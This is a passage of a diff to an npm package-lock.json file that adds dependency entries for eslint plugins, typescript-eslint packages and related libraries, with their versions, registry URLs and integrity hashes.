"sha512-35mSku4ZXK0vfCuHEDAwt55dg2jNajHZ1odvF+8SSr82EsZY4QmXfuWso8oEd8zRhVObSN18aM0CjSdoBX7zIw==", + "dev": true, + "dependencies": { + "esutils": "^2.0.2" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/eslint-plugin-import/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha1-VgiurfwAvmwpAd9fmGF4jeDVl8g=", + "dev": true + }, + "node_modules/eslint-plugin-jsx-a11y": { + "version": "6.7.1", + "resolved": "https://registry.npmjs.org/eslint-plugin-jsx-a11y/-/eslint-plugin-jsx-a11y-6.7.1.tgz", + "integrity": "sha512-63Bog4iIethyo8smBklORknVjB0T2dwB8Mr/hIC+fBS0uyHdYYpzM/Ed+YC8VxTjlXHEWFOdmgwcDn1U2L9VCA==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.20.7", + "aria-query": "^5.1.3", + "array-includes": "^3.1.6", + "array.prototype.flatmap": "^1.3.1", + "ast-types-flow": "^0.0.7", + "axe-core": "^4.6.2", + "axobject-query": "^3.1.1", + "damerau-levenshtein": "^1.0.8", + "emoji-regex": "^9.2.2", + "has": "^1.0.3", + "jsx-ast-utils": "^3.3.3", + "language-tags": "=1.0.5", + "minimatch": "^3.1.2", + "object.entries": "^1.1.6", + "object.fromentries": "^2.0.6", + "semver": "^6.3.0" + }, + "engines": { + "node": ">=4.0" + }, + "peerDependencies": { + "eslint": "^3 || ^4 || ^5 || ^6 || ^7 || ^8" + } + }, + "node_modules/eslint-plugin-jsx-a11y/node_modules/emoji-regex": { + "version": "9.2.2", + "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-9.2.2.tgz", + "integrity": "sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg==", + "dev": true + }, + "node_modules/eslint-plugin-mocha": { + "version": "10.1.0", + "resolved": "https://registry.npmjs.org/eslint-plugin-mocha/-/eslint-plugin-mocha-10.1.0.tgz", + "integrity": "sha512-xLqqWUF17llsogVOC+8C6/jvQ+4IoOREbN7ZCHuOHuD6cT5cDD4h7f2LgsZuzMAiwswWE21tO7ExaknHVDrSkw==", + "dev": true, + "dependencies": { + "eslint-utils": "^3.0.0", + "rambda": "^7.1.0" + }, + "engines": { + "node": ">=14.0.0" + }, + "peerDependencies": { + "eslint": ">=7.0.0" + } + }, + "node_modules/eslint-plugin-mocha/node_modules/eslint-utils": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/eslint-utils/-/eslint-utils-3.0.0.tgz", + "integrity": "sha512-uuQC43IGctw68pJA1RgbQS8/NP7rch6Cwd4j3ZBtgo4/8Flj4eGE7ZYSZRN3iq5pVUv6GPdW5Z1RFleo84uLDA==", + "dev": true, + "dependencies": { + "eslint-visitor-keys": "^2.0.0" + }, + "engines": { + "node": "^10.0.0 || ^12.0.0 || >= 14.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/mysticatea" + }, + "peerDependencies": { + "eslint": ">=5" + } + }, + "node_modules/eslint-plugin-n": { + "version": "15.2.0", + "resolved": "https://registry.npmjs.org/eslint-plugin-n/-/eslint-plugin-n-15.2.0.tgz", + "integrity": "sha512-lWLg++jGwC88GDGGBX3CMkk0GIWq0y41aH51lavWApOKcMQcYoL3Ayd0lEdtD3SnQtR+3qBvWQS3qGbR2BxRWg==", + "dev": true, + "peer": true, + "dependencies": { + "builtins": "^4.0.0", + "eslint-plugin-es": "^4.1.0", + "eslint-utils": "^3.0.0", + "ignore": "^5.1.1", + "is-core-module": "^2.3.0", + "minimatch": "^3.0.4", + "resolve": "^1.10.1", + "semver": "^6.3.0" + }, + "engines": { + "node": ">=12.22.0" + }, + "funding": { + "url": "https://github.com/sponsors/mysticatea" + }, + "peerDependencies": { + "eslint": ">=7.0.0" + } + }, + "node_modules/eslint-plugin-n/node_modules/eslint-utils": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/eslint-utils/-/eslint-utils-3.0.0.tgz", + "integrity": "sha512-uuQC43IGctw68pJA1RgbQS8/NP7rch6Cwd4j3ZBtgo4/8Flj4eGE7ZYSZRN3iq5pVUv6GPdW5Z1RFleo84uLDA==", + "dev": true, + "peer": true, + "dependencies": { + "eslint-visitor-keys": "^2.0.0" + }, + "engines": { + "node": "^10.0.0 || ^12.0.0 || >= 14.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/mysticatea" + }, + "peerDependencies": { + "eslint": ">=5" + } + }, + "node_modules/eslint-plugin-node": { + "version": "11.1.0", + "resolved": "https://registry.npmjs.org/eslint-plugin-node/-/eslint-plugin-node-11.1.0.tgz", + "integrity": "sha512-oUwtPJ1W0SKD0Tr+wqu92c5xuCeQqB3hSCHasn/ZgjFdA9iDGNkNf2Zi9ztY7X+hNuMib23LNGRm6+uN+KLE3g==", + "dev": true, + "dependencies": { + "eslint-plugin-es": "^3.0.0", + "eslint-utils": "^2.0.0", + "ignore": "^5.1.1", + "minimatch": "^3.0.4", + "resolve": "^1.10.1", + "semver": "^6.1.0" + }, + "engines": { + "node": ">=8.10.0" + }, + "peerDependencies": { + "eslint": ">=5.16.0" + } + }, + "node_modules/eslint-plugin-node/node_modules/eslint-plugin-es": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/eslint-plugin-es/-/eslint-plugin-es-3.0.1.tgz", + "integrity": "sha512-GUmAsJaN4Fc7Gbtl8uOBlayo2DqhwWvEzykMHSCZHU3XdJ+NSzzZcVhXh3VxX5icqQ+oQdIEawXX8xkR3mIFmQ==", + "dev": true, + "dependencies": { + "eslint-utils": "^2.0.0", + "regexpp": "^3.0.0" + }, + "engines": { + "node": ">=8.10.0" + }, + "funding": { + "url": "https://github.com/sponsors/mysticatea" + }, + "peerDependencies": { + "eslint": ">=4.19.1" + } + }, + "node_modules/eslint-plugin-prettier": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/eslint-plugin-prettier/-/eslint-plugin-prettier-4.0.0.tgz", + "integrity": "sha512-98MqmCJ7vJodoQK359bqQWaxOE0CS8paAz/GgjaZLyex4TTk3g9HugoO89EqWCrFiOqn9EVvcoo7gZzONCWVwQ==", + "dev": true, + "dependencies": { + "prettier-linter-helpers": "^1.0.0" + }, + "engines": { + "node": ">=6.0.0" + }, + "peerDependencies": { + "eslint": ">=7.28.0", + "prettier": ">=2.0.0" + }, + "peerDependenciesMeta": { + "eslint-config-prettier": { + "optional": true + } + } + }, + "node_modules/eslint-plugin-promise": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/eslint-plugin-promise/-/eslint-plugin-promise-6.0.0.tgz", + "integrity": "sha512-7GPezalm5Bfi/E22PnQxDWH2iW9GTvAlUNTztemeHb6c1BniSyoeTrM87JkC0wYdi6aQrZX9p2qEiAno8aTcbw==", + "dev": true, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "peerDependencies": { + "eslint": "^7.0.0 || ^8.0.0" + } + }, + "node_modules/eslint-plugin-react": { + "version": "7.32.2", + "resolved": "https://registry.npmjs.org/eslint-plugin-react/-/eslint-plugin-react-7.32.2.tgz", + "integrity": "sha512-t2fBMa+XzonrrNkyVirzKlvn5RXzzPwRHtMvLAtVZrt8oxgnTQaYbU6SXTOO1mwQgp1y5+toMSKInnzGr0Knqg==", + "dev": true, + "dependencies": { + "array-includes": "^3.1.6", + "array.prototype.flatmap": "^1.3.1", + "array.prototype.tosorted": "^1.1.1", + "doctrine": "^2.1.0", + "estraverse": "^5.3.0", + "jsx-ast-utils": "^2.4.1 || ^3.0.0", + "minimatch": "^3.1.2", + "object.entries": "^1.1.6", + "object.fromentries": "^2.0.6", + "object.hasown": "^1.1.2", + "object.values": "^1.1.6", + "prop-types": "^15.8.1", + "resolve": "^2.0.0-next.4", + "semver": "^6.3.0", + "string.prototype.matchall": "^4.0.8" + }, + "engines": { + "node": ">=4" + }, + "peerDependencies": { + "eslint": "^3 || ^4 || ^5 || ^6 || ^7 || ^8" + } + }, + "node_modules/eslint-plugin-react-hooks": { + "version": "4.6.0", + "resolved": "https://registry.npmjs.org/eslint-plugin-react-hooks/-/eslint-plugin-react-hooks-4.6.0.tgz", + "integrity": "sha512-oFc7Itz9Qxh2x4gNHStv3BqJq54ExXmfC+a1NjAta66IAN87Wu0R/QArgIS9qKzX3dXKPI9H5crl9QchNMY9+g==", + "dev": true, + "engines": { + "node": ">=10" + }, + "peerDependencies": { + "eslint": "^3.0.0 || ^4.0.0 || ^5.0.0 || ^6.0.0 || ^7.0.0 || ^8.0.0-0" + } + }, + "node_modules/eslint-plugin-react/node_modules/doctrine": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/doctrine/-/doctrine-2.1.0.tgz", + "integrity": "sha512-35mSku4ZXK0vfCuHEDAwt55dg2jNajHZ1odvF+8SSr82EsZY4QmXfuWso8oEd8zRhVObSN18aM0CjSdoBX7zIw==", + "dev": true, + "dependencies": { + "esutils": "^2.0.2" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/eslint-plugin-react/node_modules/resolve": { + "version": "2.0.0-next.4", + "resolved": "https://registry.npmjs.org/resolve/-/resolve-2.0.0-next.4.tgz", + "integrity": "sha512-iMDbmAWtfU+MHpxt/I5iWI7cY6YVEZUQ3MBgPQ++XD1PELuJHIl82xBmObyP2KyQmkNB2dsqF7seoQQiAn5yDQ==", + "dev": true, + "dependencies": { + "is-core-module": "^2.9.0", + "path-parse": "^1.0.7", + "supports-preserve-symlinks-flag": "^1.0.0" + }, + "bin": { + "resolve": "bin/resolve" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/eslint-plugin-testing-library": { + "version": "7.1.1", + "resolved": "https://registry.npmjs.org/eslint-plugin-testing-library/-/eslint-plugin-testing-library-7.1.1.tgz", + "integrity": "sha512-nszC833aZPwB6tik1nMkbFqmtgIXTT0sfJEYs0zMBKMlkQ4to2079yUV96SvmLh00ovSBJI4pgcBC1TiIP8mXg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@typescript-eslint/scope-manager": "^8.15.0", + "@typescript-eslint/utils": "^8.15.0" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0", + "pnpm": "^9.14.0" + }, + "peerDependencies": { + "eslint": "^8.57.0 || ^9.0.0" + } + }, + "node_modules/eslint-plugin-testing-library/node_modules/@typescript-eslint/scope-manager": { + "version": "8.21.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/scope-manager/-/scope-manager-8.21.0.tgz", + "integrity": "sha512-G3IBKz0/0IPfdeGRMbp+4rbjfSSdnGkXsM/pFZA8zM9t9klXDnB/YnKOBQ0GoPmoROa4bCq2NeHgJa5ydsQ4mA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@typescript-eslint/types": "8.21.0", + "@typescript-eslint/visitor-keys": "8.21.0" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/eslint-plugin-testing-library/node_modules/@typescript-eslint/types": { + "version": "8.21.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/types/-/types-8.21.0.tgz", + "integrity": "sha512-PAL6LUuQwotLW2a8VsySDBwYMm129vFm4tMVlylzdoTybTHaAi0oBp7Ac6LhSrHHOdLM3efH+nAR6hAWoMF89A==", + "dev": true, + "license": "MIT", + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/eslint-plugin-testing-library/node_modules/@typescript-eslint/typescript-estree": { + "version": "8.21.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/typescript-estree/-/typescript-estree-8.21.0.tgz", + "integrity": "sha512-x+aeKh/AjAArSauz0GiQZsjT8ciadNMHdkUSwBB9Z6PrKc/4knM4g3UfHml6oDJmKC88a6//cdxnO/+P2LkMcg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@typescript-eslint/types": "8.21.0", + "@typescript-eslint/visitor-keys": "8.21.0", + "debug": "^4.3.4", + "fast-glob": "^3.3.2", + "is-glob": "^4.0.3", + "minimatch": "^9.0.4", + "semver": "^7.6.0", + "ts-api-utils": "^2.0.0" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependencies": { + "typescript": ">=4.8.4 <5.8.0" + } + }, + "node_modules/eslint-plugin-testing-library/node_modules/@typescript-eslint/utils": { + "version": "8.21.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/utils/-/utils-8.21.0.tgz", + "integrity": "sha512-xcXBfcq0Kaxgj7dwejMbFyq7IOHgpNMtVuDveK7w3ZGwG9owKzhALVwKpTF2yrZmEwl9SWdetf3fxNzJQaVuxw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@eslint-community/eslint-utils": "^4.4.0", + "@typescript-eslint/scope-manager": "8.21.0", + "@typescript-eslint/types": "8.21.0", + "@typescript-eslint/typescript-estree": "8.21.0" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependencies": { + "eslint": "^8.57.0 || ^9.0.0", + "typescript": ">=4.8.4 <5.8.0" + } + }, + "node_modules/eslint-plugin-testing-library/node_modules/@typescript-eslint/visitor-keys": { + "version": "8.21.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/visitor-keys/-/visitor-keys-8.21.0.tgz", + "integrity": "sha512-BkLMNpdV6prozk8LlyK/SOoWLmUFi+ZD+pcqti9ILCbVvHGk1ui1g4jJOc2WDLaeExz2qWwojxlPce5PljcT3w==", + "dev": true, + "license": "MIT", + "dependencies": { + "@typescript-eslint/types": "8.21.0", + "eslint-visitor-keys": "^4.2.0" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/eslint-plugin-testing-library/node_modules/brace-expansion": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", + "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "dev": true, + "license": "MIT", + "dependencies": { + "balanced-match": "^1.0.0" + } + }, + "node_modules/eslint-plugin-testing-library/node_modules/debug": { + "version": "4.4.0", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.0.tgz", + "integrity": "sha512-6WTZ/IxCY/T6BALoZHaE4ctp9xm+Z5kY/pzYaCHRFeyVhojxlrm+46y68HA6hr0TcwEssoxNiDEUJQjfPZ/RYA==", + "dev": true, + "license": "MIT", + "dependencies": { + "ms": "^2.1.3" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/eslint-plugin-testing-library/node_modules/eslint-visitor-keys": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-4.2.0.tgz", + "integrity": "sha512-UyLnSehNt62FFhSwjZlHmeokpRK59rcz29j+F1/aDgbkbRTk7wIc9XzdoasMUbRNKDM0qQt/+BJ4BrpFeABemw==", + "dev": true, + "license": "Apache-2.0", + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/eslint-plugin-testing-library/node_modules/minimatch": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.5.tgz", + "integrity": "sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow==", + "dev": true, + "license": "ISC", + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=16 || 14 >=14.17" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/eslint-plugin-testing-library/node_modules/semver": { + "version": "7.6.3", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", + "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", + "dev": true, + "license": "ISC", + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/eslint-plugin-testing-library/node_modules/ts-api-utils": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ts-api-utils/-/ts-api-utils-2.0.0.tgz", + "integrity": "sha512-xCt/TOAc+EOHS1XPnijD3/yzpH6qg2xppZO1YDqGoVsNXfQfzHpOdNuXwrwOU8u4ITXJyDCTyt8w5g1sZv9ynQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=18.12" + }, + "peerDependencies": { + "typescript": ">=4.8.4" + } + }, + "node_modules/eslint-plugin-unicorn": { + "version": "56.0.0", + "resolved": "https://registry.npmjs.org/eslint-plugin-unicorn/-/eslint-plugin-unicorn-56.0.0.tgz", + "integrity": "sha512-aXpddVz/PQMmd69uxO98PA4iidiVNvA0xOtbpUoz1WhBd4RxOQQYqN618v68drY0hmy5uU2jy1bheKEVWBjlPw==", + "dev": true, + "dependencies": { + "@babel/helper-validator-identifier": "^7.24.7", + "@eslint-community/eslint-utils": "^4.4.0", + "ci-info": "^4.0.0", + "clean-regexp": "^1.0.0", + "core-js-compat": "^3.38.1", + "esquery": "^1.6.0", + "globals": "^15.9.0", + "indent-string": "^4.0.0", + "is-builtin-module": "^3.2.1", + "jsesc": "^3.0.2", + "pluralize": "^8.0.0", + "read-pkg-up": "^7.0.1", + "regexp-tree": "^0.1.27", + "regjsparser": "^0.10.0", + "semver": "^7.6.3", + "strip-indent": "^3.0.0" + }, + "engines": { + "node": ">=18.18" + }, + "funding": { + "url": "https://github.com/sindresorhus/eslint-plugin-unicorn?sponsor=1" + }, + "peerDependencies": { + "eslint": ">=8.56.0" + } + }, + "node_modules/eslint-plugin-unicorn/node_modules/ci-info": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-4.0.0.tgz", + "integrity": "sha512-TdHqgGf9odd8SXNuxtUBVx8Nv+qZOejE6qyqiy5NtbYYQOeFa6zmHkxlPzmaLxWWHsU6nJmB7AETdVPi+2NBUg==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/sibiraj-s" + } + ], + "engines": { + "node": ">=8" + } + }, + "node_modules/eslint-plugin-unicorn/node_modules/globals": { + "version": "15.11.0", + "resolved": "https://registry.npmjs.org/globals/-/globals-15.11.0.tgz", + "integrity": "sha512-yeyNSjdbyVaWurlwCpcA6XNBrHTMIeDdj0/hnvX/OLJ9ekOXYbLsLinH/MucQyGvNnXhidTdNhTtJaffL2sMfw==", + "dev": true, + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/eslint-plugin-unicorn/node_modules/regjsparser": { + "version": "0.10.0", + "resolved": "https://registry.npmjs.org/regjsparser/-/regjsparser-0.10.0.tgz", + "integrity": "sha512-qx+xQGZVsy55CH0a1hiVwHmqjLryfh7wQyF5HO07XJ9f7dQMY/gPQHhlyDkIzJKC+x2fUCpCcUODUUUFrm7SHA==", + "dev": true, + "dependencies": { + "jsesc": "~0.5.0" + }, + "bin": { + "regjsparser": "bin/parser" + } + }, + "node_modules/eslint-plugin-unicorn/node_modules/regjsparser/node_modules/jsesc": { + "version": "0.5.0", + "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-0.5.0.tgz", + "integrity": "sha512-uZz5UnB7u4T9LvwmFqXii7pZSouaRPorGs5who1Ip7VO0wxanFvBL7GkM6dTHlgX+jhBApRetaWpnDabOeTcnA==", + "dev": true, + "bin": { + "jsesc": "bin/jsesc" + } + }, + "node_modules/eslint-plugin-unicorn/node_modules/semver": { + "version": "7.6.3", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", + "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", + "dev": true, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/eslint-plugin-unicorn/node_modules/strip-indent": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/strip-indent/-/strip-indent-3.0.0.tgz", + "integrity": "sha512-laJTa3Jb+VQpaC6DseHhF7dXVqHTfJPCRDaEbid/drOhgitgYku/letMUqOXFoWV0zIIUbjpdH2t+tYj4bQMRQ==", + "dev": true, + "dependencies": { + "min-indent": "^1.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/eslint-scope": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/eslint-scope/-/eslint-scope-5.1.1.tgz", + "integrity": "sha512-2NxwbF/hZ0KpepYN0cNbo+FN6XoK7GaHlQhgx/hIZl6Va0bF45RQOOwhLIy8lQDbuCiadSLCBnH2CFYquit5bw==", + "dev": true, + "dependencies": { + "esrecurse": "^4.3.0", + "estraverse": "^4.1.1" + }, + "engines": { + "node": ">=8.0.0" + } + }, + "node_modules/eslint-scope/node_modules/estraverse": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/estraverse/-/estraverse-4.3.0.tgz", + "integrity": "sha512-39nnKffWz8xN1BU/2c79n9nB9HDzo0niYUqx6xyqUnyoAnQyyWpOTdZEeiCch8BBu515t4wp9ZmgVfVhn9EBpw==", + "dev": true, + "engines": { + "node": ">=4.0" + } + }, + "node_modules/eslint-utils": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/eslint-utils/-/eslint-utils-2.1.0.tgz", + "integrity": "sha512-w94dQYoauyvlDc43XnGB8lU3Zt713vNChgt4EWwhXAP2XkBvndfxF0AgIqKOOasjPIPzj9JqgwkwbCYD0/V3Zg==", + "dev": true, + "dependencies": { + "eslint-visitor-keys": "^1.1.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/mysticatea" + } + }, + "node_modules/eslint-utils/node_modules/eslint-visitor-keys": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-1.3.0.tgz", + "integrity": "sha512-6J72N8UNa462wa/KFODt/PJ3IU60SDpC3QXC1Hjc1BXXpfL2C9R5+AU7jhe0F6GREqVMh4Juu+NY7xn+6dipUQ==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/eslint-visitor-keys": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-2.1.0.tgz", + "integrity": "sha512-0rSmRBzXgDzIsD6mGdJgevzgezI534Cer5L/vyMX0kHzT/jiB43jRhd9YUlMGYLQy2zprNmoT8qasCGtY+QaKw==", + "dev": true, + "engines": { + "node": ">=10" + } + }, + "node_modules/eslint/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/eslint/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/eslint/node_modules/eslint-scope": { + "version": "7.2.2", + "resolved": "https://registry.npmjs.org/eslint-scope/-/eslint-scope-7.2.2.tgz", + "integrity": "sha512-dOt21O7lTMhDM+X9mB4GX+DZrZtCUJPL/wlcTqxyrx5IvO0IYtILdtrQGQp+8n5S0gwSVmOf9NQrjMOgfQZlIg==", + "dependencies": { + "esrecurse": "^4.3.0", + "estraverse": "^5.2.0" + }, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/eslint/node_modules/eslint-visitor-keys": { + "version": "3.4.3", + "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-3.4.3.tgz", + "integrity": "sha512-wpc+LXeiyiisxPlEkUzU6svyS1frIO3Mgxj1fdy7Pm8Ygzguax2N3Fa/D/ag1WqbOprdI+uY6wMUl8/a2G+iag==", + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/eslint/node_modules/glob-parent": { + "version": "6.0.2", + "resolved": "https://registry.npmjs.org/glob-parent/-/glob-parent-6.0.2.tgz", + "integrity": "sha512-XxwI8EOhVQgWp6iDL+3b0r86f4d6AX6zSU55HfB4ydCEuXLXc5FcYeOu+nnGftS4TEju/11rt4KJPTMgbfmv4A==", + "dependencies": { + "is-glob": "^4.0.3" + }, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/eslint/node_modules/globals": { + "version": "13.23.0", + "resolved": "https://registry.npmjs.org/globals/-/globals-13.23.0.tgz", + "integrity": "sha512-XAmF0RjlrjY23MA51q3HltdlGxUpXPvg0GioKiD9X6HD28iMjo2dKC8Vqwm7lne4GNr78+RHTfliktR6ZH09wA==", + "dependencies": { + "type-fest": "^0.20.2" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/eslint/node_modules/optionator": { + "version": "0.9.3", + "resolved": "https://registry.npmjs.org/optionator/-/optionator-0.9.3.tgz", + "integrity": "sha512-JjCoypp+jKn1ttEFExxhetCKeJt9zhAgAve5FXHixTvFDW/5aEktX9bufBKLRRMdU7bNtpLfcGu94B3cdEJgjg==", + "dependencies": { + "@aashutoshrathi/word-wrap": "^1.2.3", + "deep-is": "^0.1.3", + "fast-levenshtein": "^2.0.6", + "levn": "^0.4.1", + "prelude-ls": "^1.2.1", + "type-check": "^0.4.0" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/eslint/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/esm": { + "version": "3.2.25", + "resolved": "https://registry.npmjs.org/esm/-/esm-3.2.25.tgz", + "integrity": "sha512-U1suiZ2oDVWv4zPO56S0NcR5QriEahGtdN2OR6FiOG4WJvcjBVFB0qI4+eKoWFH483PKGuLuu6V8Z4T5g63UVA==", + "engines": { + "node": ">=6" + } + }, + "node_modules/esmock": { + "version": "2.6.3", + "resolved": "https://registry.npmjs.org/esmock/-/esmock-2.6.3.tgz", + "integrity": "sha512-1gtVLLHyB742JNWkIFfiKwB8rXgJZO/X717ua4yzT0hIqsDFjtnrpAKHO+HlIMSIhMExCWJzpk9lDsh2XuKAKw==", + "engines": { + "node": ">=14.16.0" + } + }, + "node_modules/esniff": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/esniff/-/esniff-2.0.1.tgz", + "integrity": "sha512-kTUIGKQ/mDPFoJ0oVfcmyJn4iBDRptjNVIzwIFR7tqWXdVI9xfA2RMwY/gbSpJG3lkdWNEjLap/NqVHZiJsdfg==", + "dependencies": { + "d": "^1.0.1", + "es5-ext": "^0.10.62", + "event-emitter": "^0.3.5", + "type": "^2.7.2" + }, + "engines": { + "node": ">=0.10" + } + }, + "node_modules/espree": { + "version": "9.6.1", + "resolved": "https://registry.npmjs.org/espree/-/espree-9.6.1.tgz", + "integrity": "sha512-oruZaFkjorTpF32kDSI5/75ViwGeZginGGy2NoOSg3Q9bnwlnmDm4HLnkl0RE3n+njDXR037aY1+x58Z/zFdwQ==", + "dependencies": { + "acorn": "^8.9.0", + "acorn-jsx": "^5.3.2", + "eslint-visitor-keys": "^3.4.1" + }, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/espree/node_modules/acorn": { + "version": "8.10.0", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.10.0.tgz", + "integrity": "sha512-F0SAmZ8iUtS//m8DmCTA0jlh6TDKkHQyK6xc6V4KDTyZKA9dnvX9/3sRTVQrWm79glUAZbnmmNcdYwUIHWVybw==", + "bin": { + "acorn": "bin/acorn" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/espree/node_modules/eslint-visitor-keys": { + "version": "3.4.3", + "resolved": 